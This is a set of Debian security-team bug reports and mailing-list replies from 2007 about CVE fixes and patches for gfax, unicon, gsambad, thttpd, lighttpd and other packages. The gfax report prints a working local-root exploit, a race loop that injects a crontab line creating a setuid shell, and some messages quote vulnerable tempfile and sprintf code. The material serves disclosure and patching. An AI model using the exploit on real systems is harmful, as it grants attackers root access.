  This seems to be a low-risk, from the one page I found describing
 it:

 
http://www.securitylab.ru/forum/read.php?FID=21&TID=40858&MID=326187#message326187

  Basically "zzcat $longfilename" crashes.  I wouldn't have thought
 this would require a DSA.

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#435735: CVE-2007-3791: Buffer overflow in policyd

[Steve Kemp]

On Thu Aug 02, 2007 at 23:34:10 +0200, Stefan Fritsch wrote:
> Package: postfix-policyd
> Version: 1.80-2.1
> Severity: grave
> Tags: security
> Justification: user security hole
> 
> A vulnerability has been found in policyd. From CVE-2007-3791:

  Building now.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#396360: Maybe time for DSA?

[Steve Kemp]

On Sat Jul 28, 2007 at 11:18:54 +0300, Touko Korpela wrote:
> This bug has patch included, maybe security team could do upload?

  The code in Etch already contains this patch...  I've not
 had a chance to check sarge yet, but I'm thinking that we're 
 OK.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#434888: Multiple vulnerabilities [CVE-2007-3946] [CVE-2007-3947] [CVE-2007-3948] [CVE-2007-3949] [CVE-2007-3950]

[Steve Kemp]

On Fri Jul 27, 2007 at 09:11:48 -0500, Adam Majer wrote:
> Package: lighttpd
> Severity: critical
> Tags: security
> 
> Upstream patches from Trac seem to be available from upstream.

  Still waiting on CVE IDs.  I can upload without them, but I'd
 rather not ..

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#434546: lighttpd: 1.4.16 has been released and contains security fixes

[Steve Kemp]

On Tue Jul 24, 2007 at 21:14:31 +0200, Olaf van der Spek wrote:

> Lighttpd 1.4.16 has been released and contains security fixes, see 
> http://www.lighttpd.net/2007/7/24/1-4-16-let-s-ship-it

  A release is in preperation, just waiting on CVE IDs.  We have
 one ..

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#428368: lighttpd vuln patch

[Steve Kemp]

  This one isn't going to get released as-is, as there are a couple
 more pending issues with lighttpd.
  I'll roll them all up once I have valid identifiers for them.

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#428368: lighttpd vuln patch

[Steve Kemp]

On Fri Jul 20, 2007 at 11:02:07 +0200, Pierre Habouzit wrote:
>   attached is the patch that fixes it. I'm going to NMU lighttpd in
> unstable, please someone takes care of etch.

  Joey if you could allocate a DOS CVE ID I'll do the upload,
 I've already done lighttpd patches for etch.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#432924: [CVE-2007-3641, CVE-2007-3644, CVE-2007-3645] various security bugs

[Steve Kemp]

On Fri Jul 13, 2007 at 08:16:07 -0500, John Goerzen wrote:
> I will upload a fix to unstable shortly.  However, it sounds like this could 
> also impact the version in stable, so CCing [EMAIL PROTECTED]

  Yes that looks to be the case.

  If you had a patch that would apply to the version in Stable that
 would be appreciated.  I applied the FreeBSd patch but that failed
 more than it succeeded ..

  I'll have a few hours tomorrow to look at it, so don't worry too
 much if you can't supply it.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

[Steve Kemp]

On Mon Jul 09, 2007 at 17:43:47 -0700, Steve Langasek wrote:

> > Ok, uploading.
> 
>  -- please kick this one out, I just noticed I built it with
> stable-security as the target.

  I'd be happy to do that if you, or somebody else, could tell me
 how to do so..

> Let me know if you would like me to re-roll -7 or prepare a -8 instead.

  I think we need a -8 if the -7 has been seen, right?

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

[Steve Kemp]

On Mon Jul 09, 2007 at 12:43:57 -0700, Steve Langasek wrote:

> I've uploaded a freetype 2.1.7-7 package to
> , signed and built for sarge. 

  Thanks.

> Let me know if you would like me to upload this to security.d.o (I promise
> I'll even use the embargoed queue this time, so you don't have to go hunting
> for the upload ;).

  That'd be grand, thanks.

> Unfortunately, going back through my mail I see that there's another open
> security report against freetype, bug #426771.  I have not investigated this
> at all to confirm which versions of freetype are affected.  Please advise if
> you would like me to look into this for possible inclusion in 2.1.7-7.

  :(

  I think that for the moment it would be best to push this out so that
 we're all on a level playing field.  (Which reminds me some of the
 slower buildds have started catching up too..)

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431893: Acknowledgement (CVE-2007-2839: Trivial local-root attack)

[Steve Kemp]

  This is fixed in DSA-1329-1.  Just reported here for reference.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431893: CVE-2007-2839: Trivial local-root attack

[Steve Kemp]

Package: gfax
Version: 0.4.2-11
Severity: grave
Usertags: sourcescan
Tags: security

*** Please type your report below this line ***


  The gfax package as released in Sarge, make unsafe use of temporary files
 which allow local users to gain root trivially.

  Etch, Lenny, and Sid are unaffected.


  The following code is in src/mgetty_setup.c:

/* if it's NULL then nuke the faxrunq crontab entry.  */
if ((fin = fopen("/etc/crontab", "r")) == NULL) {
do_message(_("\nCan't open /etc/crontab\n"));
return;
}
if ((fout = fopen("/tmp/crontab", "w")) == NULL) {
do_message(_("\nCan't create /tmp/crontab\n"));
return;
}

while (fgets(buf, 128, fin) != NULL) {
fputs(buf, fout);
fclose(fout);
fclose(fin);

/* now copy the new file back to /etc */
if ((fin = fopen("/tmp/crontab", "r")) == NULL) {
do_message(_("\nCan't open /tmp/crontab\n"));
return;
}
if ((fout = fopen("/etc/crontab", "w")) == NULL) {
do_message(_("\nCan't create /etc/crontab\n"));
return;
}

while ((c = fgetc(fin)) != EOF)
fputc(c, fout);

fclose(fout);
fclose(fin);
remove("/tmp/crontab");


  This can be abused to write arbitary commands to the /etc/crontab file.

  If /tmp/crontab exists already, owned by a non-root user then it will
 be truncated and trashed.  However the ownership will still remain that
 of the non-root user - so a race condition between the first copy
 and the second copy can allow arbitary line(s) to be appended to /etc/crontab.

  The following exploits this easily:

[EMAIL PROTECTED]:~$ while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp 
&& chmod 4755 /tmp/sh" > /tmp/crontab; done

  When root runs the setup program things end up like this:

[EMAIL PROTECTED]:~$ ls -l /etc/crontab 
-rw-r--r-- 1 root root 60 2007-07-02 20:27 /etc/crontab

[EMAIL PROTECTED]:~$ cat /etc/crontab
*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh

[EMAIL PROTECTED]:~$ ls -l /tmp/sh
-rwsr-xr-x 1 root root 769368 2007-07-02 20:28 /tmp/sh


Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431332: CVE-2007-2837: Arbitary file removal

[Steve Kemp]

On Sun Jul 01, 2007 at 21:56:43 +0200, Martin MAURER wrote:

> I agree that this code could become a problem, although I wasn't able to
> reproduce using screen and the command written in your mail.

  I could reproduce this using the -qt version of the client.  First of
 all adding some rules, then bringing up the rule list and removing one
 of them.

> Anyways - what really might happen is that the file is overwritten, not
> deleted, as rm should delete the link not the file the link points to.

  That is generally true.  I'm trying to remember whether it was
 unlinked and I'm 99% certain it was, rather than truncated/trashed.

> Nevertheless, this doesnt make a big difference, so I will add your fix
> to the official version of fireflier. 

  Thanks a lot.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431336: Patch

[Steve Kemp]

  Patch we used for the DSA.

diff -u unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/CCE_pinyin.c
@@ -159,9 +159,9 @@
 IMM_Flush ()
 {
   char name[256];
-  sprintf(name,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
+  snprintf(name,sizeof(name)-1,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
   SaveUsrPhrase(name);
-  sprintf(name,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
+  snprintf(name,sizeof(name)-1,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
   SavePhraseFrequency(name);
 
   return 1;
diff -u unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c 
unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
--- unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
+++ unicon-3.0.4/unicon/ImmModules/cce/xl_pinyin.c
@@ -138,21 +138,21 @@
   //Rat: modified for processing user-defined dictionaries
   if ((usrhome = getenv ("HOME")) != NULL)
{
-  sprintf (buf, "%s/%s", usrhome, ".pyinput");
+  snprintf (buf,sizeof(buf)-1, "%s/%s", usrhome, ".pyinput");
   retval = stat (buf, &statbuf);
 
   if ((retval == 0))
{
  if ((statbuf.st_mode & S_IFMT) == S_IFDIR)
{
- sprintf (buf, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s/%s", usrhome, ".pyinput", 
"usrphrase.tab");
 
  if ( (retval = stat(buf, &statbuf)) == 0)
{
  if ( statbuf.st_size < MIN_USRPHR_SIZE || LoadUsrPhrase (buf) 
== -1)
{
  printf ("Couldn't load %s. Please fix it. size or load 
error\n", buf);
- sprintf (buf, "%s/%s", szPath, 
"usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", 
szPath, "usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
@@ -164,7 +164,7 @@
  else
{
  creat (buf, 0600);
- sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, 
"usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
@@ -181,10 +181,10 @@
   else
{
  mkdir (buf, 0700);//Rat: making $HOME/.pyinput
- sprintf (buf, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s/%s", usrhome, ".pyinput", 
"usrphrase.tab");
  creat (buf, 0600);//Rat: making $HOME/.pyinput/usrphrase.tab
 
- sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+ snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, "usrphrase.tab");
  if ((retval = access (buf, R_OK)) == 0)
{
  if (LoadUsrPhrase (buf) == -1)
@@ -197,7 +197,7 @@
   else
 {
   printf ("Sorry, I couldn't find your $HOME.\n");
-  sprintf (buf, "%s/%s", szPath, "usrphrase.tab");
+  snprintf (buf, sizeof(buf)-1, "%s/%s", szPath, "usrphrase.tab");
   printf ("Turn to access %s", buf);
 
   if ((retval = access (buf, R_OK)) != 0)
@@ -210,7 +210,7 @@
 
 }
 
-  sprintf(buf,"%s/%s/%s",usrhome,".pyinput","sysfrequency.tab");
+  snprintf(buf,sizeof(buf)-1,"%s/%s/%s",usrhome,".pyinput","sysfrequency.tab");
   if(LoadPhraseFrequency(buf) == -1)
   {
  creat(buf,0700);
@@ -229,7 +229,7 @@
   AdjustPhraseFreq (); // lower the freq to [0,50)
   if (usrhome != NULL)
 {
-  sprintf (szFileName, "%s/%s/%s", usrhome, ".pyinput", "usrphrase.tab");
+  snprintf (szFileName, sizeof(szFileName)-1, "%s/%s/%s", usrhome, 
".pyinput", "usrphrase.tab");
   SaveUsrPhrase (szFileName);
 }
   else
diff -u unicon-3.0.4/debian/changelog unicon-3.0.4/debian/changelog
--- unicon-3.0.4/debian/changelog
+++ unicon-3.0.4/debian/changelog
@@ -1,3 +1,11 @@
+unicon (3.0.4-11etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Fix the unsafe use of environmental variables.
+[CVE-2007-2835]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Sun,  24 Jul 2007 15:02:42 +
+
 unicon (3.0.4-11) unstable; urgency=low
 
   * Changed TLS_PthSocket ::read ::write to Read, Write.


Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated

[Steve Kemp]

On Sun Jul 01, 2007 at 21:47:42 +0200, Daniel Baumann wrote:

> uploaded 0.1.6-2 with your patch and urgency=high, so you probably want
> to mention this version for testing/sid in the DSA.

  Great.

> no offence intended, but i'd be happy if you can next time attach the
> patch to the bug report right from the beginning.

  None taken.  That was a genuine mistake, I honestly thought I'd 
 copied you into my initial report with the problem.  I usually do
 that so that maintainers aren't caught on the hop.

  I'll be much more careful to make sure I do that next time.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated

[Steve Kemp]

On Sun Jul 01, 2007 at 20:54:24 +0200, Daniel Baumann wrote:

> I assume that the 0.1.4-2etch1 upload a few minutes ago was a security
> upload of yours, hence I'll wait until this appears and upload then a
> fixed package to sid.

  yes that is correct.

  If you're happy to upload soon that would be great.  I'll attach the
 patch I used.

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/

diff -u gsambad-0.1.4/config.sub gsambad-0.1.4/config.sub
--- gsambad-0.1.4/config.sub
+++ gsambad-0.1.4/config.sub
@@ -4,7 +4,7 @@
 #   2000, 2001, 2002, 2003, 2004, 2005, 2006 Free Software Foundation,
 #   Inc.
 
-timestamp='2006-09-20'
+timestamp='2006-07-02'
 
 # This file is (in principle) common to ALL GNU software.
 # The presence of a machine in this file suggests that SOME GNU software
@@ -276,7 +276,6 @@
 	| pdp10 | pdp11 | pj | pjl \
 	| powerpc | powerpc64 | powerpc64le | powerpcle | ppcbe \
 	| pyramid \
-	| score \
 	| sh | sh[1234] | sh[24]a | sh[23]e | sh[34]eb | sheb | shbe | shle | sh[1234]le | sh3ele \
 	| sh64 | sh64le \
 	| sparc | sparc64 | sparc64b | sparc64v | sparc86x | sparclet | sparclite \
@@ -285,7 +284,7 @@
 	| tahoe | thumb | tic4x | tic80 | tron \
 	| v850 | v850e \
 	| we32k \
-	| x86 | xc16x | xscale | xscalee[bl] | xstormy16 | xtensa \
+	| x86 | xscale | xscalee[bl] | xstormy16 | xtensa \
 	| z8k)
 		basic_machine=$basic_machine-unknown
 		;;
@@ -368,7 +367,7 @@
 	| tron-* \
 	| v850-* | v850e-* | vax-* \
 	| we32k-* \
-	| x86-* | x86_64-* | xc16x-* | xps100-* | xscale-* | xscalee[bl]-* \
+	| x86-* | x86_64-* | xps100-* | xscale-* | xscalee[bl]-* \
 	| xstormy16-* | xtensa-* \
 	| ymp-* \
 	| z8k-*)
@@ -910,10 +909,6 @@
 	sb1el)
 		basic_machine=mipsisa64sb1el-unknown
 		;;
-	sde)
-		basic_machine=mipsisa32-sde
-		os=-elf
-		;;
 	sei)
 		basic_machine=mips-sei
 		os=-seiux
@@ -1371,9 +1366,6 @@
 # system, and we'll never get to this point.
 
 case $basic_machine in
-score-*)
-		os=-elf
-		;;
 spu-*)
 		os=-elf
 		;;
diff -u gsambad-0.1.4/debian/changelog gsambad-0.1.4/debian/changelog
--- gsambad-0.1.4/debian/changelog
+++ gsambad-0.1.4/debian/changelog
@@ -1,4 +1,12 @@
-gsambad (0.1.4-2) unstable; urgency=medium
+gsambad (0.1.4-2etch1) stable-security; urgency=high
+
+  * Non-maintainer upload by The Security Team.
+  * Avoid unsafe usage of temporary files.
+[CVE-2007-2838]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Thu, 28 Jun 2007 16:47:39 +
+
+gsambad (0.1.4-2) unstable; urgency=medium	
 
   * Adjusting the icondir.
   * Makeing use of su-to-root in the desktop file.
only in patch2:
unchanged:
--- gsambad-0.1.4.orig/src/populate_conns.c
+++ gsambad-0.1.4/src/populate_conns.c
@@ -48,7 +48,8 @@
 long file_size=0, old_pos=0;
 gchar *combined=NULL;
 gchar *utf8=NULL;
-
+char command_buffer[1024];
+char * filename;
 gtk_list_store_clear(widgets->conns_store);
 
 /* This attempt to show useful output is probably quite
@@ -64,20 +65,37 @@
 fflush(stdin);
 fflush(stdout);
 
-/* Write the output of smbstatus to a tempfile, FIXME: Static paths and generally notgoodtoday */
-if((fp=popen("touch /tmp/gsambadtmp && chmod 600 /tmp/gsambadtmp && smbstatus 2>&1> /tmp/gsambadtmp", "w"))==NULL)
+/* make a secure temporary file */
+filename = tempnam( "/tmp", "p_c.c" );
+
+/* Write the output of smbstatus to a tempfile. */
+snprintf( command_buffer, sizeof(command_buffer) - 1,
+	  "touch %s && chmod 600 %s && smbstatus 2>&1> %s",
+	  filename, filename, filename );
+
+if((fp=popen(command_buffer, "w"))==NULL)
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
 pclose(fp);
 
 /* We want it in a tempfile so we can scroll around in it properly */
-if((fp=fopen("/tmp/gsambadtmp", "r"))==NULL) // FIXME: Static paths
+if((fp=fopen(filename, "r"))==NULL) // FIXME: Static paths
 {
+/*  free memory */
+free( filename );
+
 	/* Dont show a popup */
 return;
 }
+
+/*  free memory */
+free( filename );
+
 fseek(fp, 0, SEEK_END);
 file_size = ftell(fp);
 rewind(fp);

Bug#431336: CVE-2007-2835 : Buffer overflow.

[Steve Kemp]

Package: unicon-imc2
Version: 3.0.4-11
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  CVE-2007-2835 : Allows local root compromise via zhcon.

  Anyway, the setuid(0) zhcon application links to this library,
 which contains a buffer overflow which may be used to gain root.
 (Actually any application using this library can be exploited; 
 this is the only setuid one I could spot.)

  The source of this problem is ./unicon/ImmModules/cce/CCE_pinyin.c:

static int
IMM_Flush ()
{
  char name[256];
  sprintf(name,"%s/.pyinput/usrphrase.tab",getenv("HOME"));
  SaveUsrPhrase(name);
  sprintf(name,"%s/.pyinput/sysfrequency.tab",getenv("HOME"));
  SavePhraseFrequency(name);

  return 1;
}

  There are similar problems in the file /unicon/ImmModules/cce/xl_pinyin.c
 too.


Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#431332: CVE-2007-2837: Arbitary file removal

[Steve Kemp]

Package: fireflier-server
Version: 1.1.6-3
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2837.

  The server, fireflierd, runs with root privileges and the code
 contains this gem which I think speaks for itself:

string getRule(unsigned int chainid, int rulenum)
{
   ...

   cmd="rm -f /tmp/fireflier.rules && touch /tmp/fireflier.rules && 
chmod 0700 /tmp/fireflier.rules && ";
   cmd+=IPTABLES_SAVE;
   cmd+=" > /tmp/fireflier.rules";
   if(DEBUG)
 cout<<"cmd: "

Bug#431331: CVE-2007-2838: Allow arbitary files to be created/truncated

[Steve Kemp]

Package: gsambad
Version: 0.1.5-5
Severity: grave
Usertags: sourcescan

*** Please type your report below this line ***

  Security issue: CVE-2007-2838
   
  The gsambad package contains a binary (which may only be
 executed by the root user) with the following code in it:


if((fp=popen("touch /tmp/gsambadtmp && chmod 600 /tmp/gsambadtmp 
 && smbstatus 2>&1> /tmp/gsambadtmp", "w"))==NULL)
{  
 /* Dont show a popup */
return;
}

  This can be used to create/trash arbitary files upon the system with
 a symlink attack.  

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#430691: [EMAIL PROTECTED]

[Steve Kemp]

On Wed Jun 27, 2007 at 11:29:12 +0900, Taku YASUI wrote:

> I'll upload new upstream version to sid soon.
> And I attach the patch to fix this problem.

  Great, thanks.

  If you could tell us which version in Sid would fix the problem
 I can include that in the advisory.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#430691: hiki: [security] vulnerability that arbitrary files would be deleted

[Steve Kemp]

>  Hiki 0.8.0 - 0.8.6 is affected, it means that stable, testing and unstable
>  pacakges in Debian are affected. Please update hiki package.
> 
>  For more detail, see http://hikiwiki.org/en/advisory20070624.html

  Joey if you could allocate an ID I'll upload a fixed package.

Steve
-- 


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#430012: CVE-2006-4168: Integer overflow vulnerability fixed in 0.6.16

[Steve Kemp]

On Thu Jun 21, 2007 at 20:16:41 +0200, Stefan Fritsch wrote:

> CVE-2006-4168:
> "Integer overflow in the exif_data_load_data_entry function in
> libexif/exif-data.c in Libexif before 0.6.16 allows remote attackers to
> cause a denial of service (application crash) or execute arbitrary code
> via an image with many EXIF components, which triggers a heap-based
> buffer overflow."
> 
> This is fixed in 0.6.16, see
> http://sourceforge.net/project/shownotes.php?release_id=515385

  This was already fixed, for Sarge + Etch:


http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00070.html

http://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00071.html

Steve
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#429218: [CVE-2007-3125] format string issue in X.509 certificate processing

[Steve Kemp]

  Fixed already in Stable (etch):

  w3m (0.5.1-5.1) unstable; urgency=high

* NMU by the Security Team:
* Fix format string vulnerability in display of SSL certificates.
 (No CVE ID yet) (Closes: #404564)

   -- Moritz Muehlenhoff <[EMAIL PROTECTED]>  Tue, 26 Dec 2006 18:49:26 +0100

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#424690: CVE-2007-1673: denial of service (infinite loop) in zoo and unzoo

[Steve Kemp]

  I see no copy of the vulnerable code in the Debian version of unzoo,
 I suspect this is only an issue for the non-free version of unzoo,
 which we'll not release an update for.

  Comments?

Steve
-- 
# Commercial Debian GNU/Linux Support
http://www.linux-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#429191: flyspray phpmailer: not relevant for stable

[Steve Kemp]

On Sun Jun 17, 2007 at 18:20:01 +0200, Thijs Kinkhorst wrote:

> For stable I've checked whether it's 
> vulnerable and I believe it's not: the vulnerability is in the SendmailSend() 
> function. That requires for the calling code to actually use the sendmail 
> method, which Flyspray does not allow in any configuration.
> 
> I suppose the security team does not send advisories for insecure code that 
> is 
> not called?

  Agreed.

> As an additional note: sarge is not vulnerable because it doesn't contain a 
> copy of the phpmailer class at all.

  :)

  So we don't need to do anything, perfect!

Steve
-- 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

[Steve Kemp]

On Wed May 30, 2007 at 06:19:29 -0700, Steve Langasek wrote:

> Signed package for etch is on its way up to
>  right now (built with -sa, so
> should indeed be ready for upload straight to security-master).

  Thanks a lot, Steve.

> Let me know if there's anything else you need from me for etch.  

  Looks good, thanks.  I'll upload tomorrow with an aim of getting
 it released on Friday.

> I haven't
> yet looked into whether this bug affects the sarge version of the package,
> I'll do that next (unless somebody here already knows the answer).

  I was under the impression that it wasn't vulnerable, but I admit
 I've not yet checked.  If we've not heard back by the time I make 
 the upload I'll take a look myself.

Steve
-- 
http://www.steve.org.uk/


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#425625: CVE-2007-2754: integer overflow and heap-based buffer overflow vulnerability in freetype

[Steve Kemp]

On Sun May 27, 2007 at 12:47:58 +0200, Moritz Muehlenhoff wrote:

> I guess we should fix this, it's indirectly remotely exploitable at least
> by providing someone a malformed TTF font file. As libfreetype is an important
> infrastructure library there might also be unforeseen indirect attack
> vectors, like embedding TTFs in other document types, etc.

  Agreed.

> Steve Kemp wanted to work on a DSA, so you should probably check back
> with him before preparing an upload.

  I was planning on handling this yes, so if there were a fixed package
 available for Etch then I'd appreciate seeing it.

Steve
-- 
Debian GNU/Linux System Administration
http://www.debian-administration.org/



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#404233: CVE-2006-6678: Netrik arbitrary command execution

[Steve Kemp]

On Fri, Dec 22, 2006 at 06:42:41PM +0100, Stefan Fritsch wrote:

> A vulnerability has been reported in Netrik:

  Thanks for the report.  Security update for Sarge is building now.

  Patch attached:

Steve
-- 

--- form-file.c 2003-08-06 10:28:45.0 +
+++ /home/skx/form-file.c   2006-12-22 22:19:12.0 +
@@ -10,6 +10,7 @@
  * (C) 2003 antrik
  */

+#include 
 #include 
 #include 
 #include 
@@ -107,6 +108,14 @@
   char temp_name[size];
   snprintf(temp_name, size, format, name);

+  /* make sure we get a proper filename */
+  {
+char   *chr;
+for(chr=temp_name; *chr; ++chr)
+   if(!isalnum(*chr))/* not safe filename char -> replace */
+  *chr='_';
+  }
+
   /* write temporary file */
   {
 intfildes;



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#398936: libapache2-mod-ifier: The module breaks POST processing

[Steve Kemp]

Package: libapache2-mod-ifier
Version: 0.8-2
Severity: grave
Justification: renders package unusable


  This module, when installed and enabled, breaks all processing of
 POST requests.

  It should be removed from Etch until it can be updated to work
 correctly.

-- System Information:
Debian Release: 4.0
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.18-1-486
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)

Versions of packages libapache2-mod-ifier depends on:
ii  apache2.2-common 2.2.3-3.1   Next generation, scalable, extenda
ii  libc62.3.6.ds1-8 GNU C Library: Shared libraries

libapache2-mod-ifier recommends no packages.

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#396277: allows creating any file as root

[Steve Kemp]

Daniel

  Please find attached the patch I'm going to use for the security
 update.

  Could you please apply it, or a comparable patch to the version
 in unstable and let us know which version will fix the problem?

Steve
-- 
# The Debian Security Audit Project.
http://www.debian.org/security/audit

[EMAIL PROTECTED]:/tmp$ interdiff thttpd_2.23beta1-3sarge1.diff  
thttpd_2.23beta1-3sarge2.diff
diff -u thttpd-2.23beta1/debian/changelog thttpd-2.23beta1/debian/changelog
--- thttpd-2.23beta1/debian/changelog
+++ thttpd-2.23beta1/debian/changelog
@@ -1,3 +1,11 @@
+thttpd (2.23beta1-3sarge2) stable-security; urgency=high
+
+  * Non-maintainer upload by the Security Team.
+  * Fix the insecure use of temporary files when invoked by logrotate.
+[CVE-2006-4248]
+
+ -- Steve Kemp <[EMAIL PROTECTED]>  Tue, 31 Oct 2006 17:49:34 +
+
 thttpd (2.23beta1-3sarge1) stable-security; urgency=high

   * Non-maintainer upload by the Security Team
diff -u thttpd-2.23beta1/debian/thttpd.logrotate 
thttpd-2.23beta1/debian/thttpd.logrotate
--- thttpd-2.23beta1/debian/thttpd.logrotate
+++ thttpd-2.23beta1/debian/thttpd.logrotate
@@ -4,15 +4,9 @@
 compress
 missingok
 delaycompress
-prerotate
-   if pidof thttpd 2>&1 > /dev/null; then
-   touch /tmp/start_thttpd
-   fi
-endscript
 postrotate
-   if [ -f /tmp/start_thttpd ]; then
+if [ -f /var/run/thttpd.pid ]; then
/etc/init.d/thttpd restart 2>&1 > /dev/null
-   rm -f /tmp/start_thttpd
fi
 endscript
 }



signature.asc
Description: Digital signature

Bug#396277: allows creating any file as root

[Steve Kemp]

On Mon, Oct 30, 2006 at 10:56:28PM +0100, Marco d'Itri wrote:

> By creating a /tmp/start_thttpd symlink a local attacker will be able to
> create/touch any file as root.

  Thanks for the report.  Once I get a CVE identifier allocated I'll
 handle an update for Sarge.

